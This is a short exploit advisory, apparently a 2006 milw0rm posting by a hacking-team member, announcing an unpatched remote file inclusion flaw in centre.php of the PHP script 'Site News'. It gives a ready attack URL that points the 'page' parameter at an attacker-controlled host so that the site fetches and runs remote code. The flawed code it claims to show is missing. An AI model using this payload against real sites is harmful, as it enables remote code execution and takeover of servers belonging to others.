#===================================================================================# # # Site News => (centre.php) $page Remote File Inclusion Exploit # #===================================================================================# # # Softname : Site News # Url : http://dvmet.free.fr/script/site_news.zip # Exploit type : Remote File Inclusion. # Critical: Dangerous. # Solution Status: Unpatched. # #===================================================================================# # # By DaDIsS - Member of the Moroccan Hackers Team # #===================================================================================# # # Exploit Explanation : # # # The flaw resides in centre.php file that contain this code : # # # #===================================================================================# # # Example : # # # http://www.victime.com/(path)/centre.php?page=http://attacker # # #================================================================# # # Greetz : YouYouCool, Hacker1, and all Moroccan Hackers Team, viva Morocco guyz !! # #===================================================================================# # # DaDIsS / dadiss@virtuaplanet.net # Proud to be a Moroccan ! # #===================================================================================# # milw0rm.com [2006-11-23]